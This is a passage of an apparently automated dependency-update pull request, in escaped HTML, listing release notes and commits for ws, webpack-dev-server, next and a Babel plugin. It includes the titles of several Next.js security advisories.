href=\"https://github.com/websockets/ws/commit/ce2a3d62437995a47e6056d485a33d21b6a8f867\"\u003e\u003ccode\u003ece2a3d6\u003c/code\u003e\u003c/a\u003e [ci] Test on node 26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/58e45b872bb0f35a3edd553c27e105300a4f5bd0\"\u003e\u003ccode\u003e58e45b8\u003c/code\u003e\u003c/a\u003e [ci] Do not test on node 25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5f26c245231a4b018479a9269e8c3da4773fe42f\"\u003e\u003ccode\u003e5f26c24\u003c/code\u003e\u003c/a\u003e [ci] Run the lint step on node 24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/843925544e2f4cffe445e0179947f56d6c5b608f\"\u003e\u003ccode\u003e8439255\u003c/code\u003e\u003c/a\u003e [dist] 8.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/d3503c1fd36a310985108f62b343bae18346ab67\"\u003e\u003ccode\u003ed3503c1\u003c/code\u003e\u003c/a\u003e [minor] Export the \u003ccode\u003ePerMessageDeflate\u003c/code\u003e class and header utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/3ee5349a0b1580f6e1f347b59ec3371011bd8481\"\u003e\u003ccode\u003e3ee5349\u003c/code\u003e\u003c/a\u003e [api] Convert the \u003ccode\u003eisServer\u003c/code\u003e and \u003ccode\u003emaxPayload\u003c/code\u003e parameters to options\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/91707b470ebd803aaa3fd1e896217740f39267d4\"\u003e\u003ccode\u003e91707b4\u003c/code\u003e\u003c/a\u003e [doc] Add missing space\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8b553192268810a83253e2a4a39ac16768e75bb3\"\u003e\u003ccode\u003e8b55319\u003c/code\u003e\u003c/a\u003e [pkg] Update eslint to version 10.0.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/websockets/ws/compare/8.17.1...8.20.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 15.4.0 to 15.5.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.5.18\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - Incomplete Fix Follow-Up\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.16\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.15\u003c/h2\u003e\n\u003cp\u003ePlease refer the following changelogs for more information about this security release:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://vercel.com/changelog/summary-of-cve-2026-23869\"\u003ehttps://vercel.com/changelog/summary-of-cve-2026-23869\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev15.5.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9ff92cebcaa6ba4e7463b6fd037a8510ba9b81ec\"\u003e\u003ccode\u003e9ff92ce\u003c/code\u003e\u003c/a\u003e v15.5.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/00ebe23562bd7eb32dd78730984bfadb47138bcf\"\u003e\u003ccode\u003e00ebe23\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/62c97ab0b5825e2cbc15f6b682d8286a8dd6a038\"\u003e\u003ccode\u003e62c97ab\u003c/code\u003e\u003c/a\u003e v15.5.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/423623ae38c106273085b66946ee5bf9aab77f2c\"\u003e\u003ccode\u003e423623a\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/fa787399b38d9aa702118f9bd23a8315b9f0ecc6\"\u003e\u003ccode\u003efa78739\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36e62c6eb7813e42d409eb487f93b829f4ad77e8\"\u003e\u003ccode\u003e36e62c6\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93588\"\u003e#93588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36589b5db512b7704cdadd873cbe49b6dbcc9261\"\u003e\u003ccode\u003e36589b5\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93596\"\u003e#93596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ad6fd4e50e5aba20b60d283c42b89273a3167ccd\"\u003e\u003ccode\u003ead6fd4e\u003c/code\u003e\u003c/a\u003e v15.5.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/79d7dff1448483f0c8f187f98887b31019f6e494\"\u003e\u003ccode\u003e79d7dff\u003c/code\u003e\u003c/a\u003e Ignore malformed CSP nonce headers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/c4f69086cc8dcbd81b1dbc321c98ea874d90d6f8\"\u003e\u003ccode\u003ec4f6908\u003c/code\u003e\u003c/a\u003e router-server: guard upgrade proxy against absolute-url SSRF (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/77\"\u003e#77\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v15.4.0...v15.5.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.22.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca 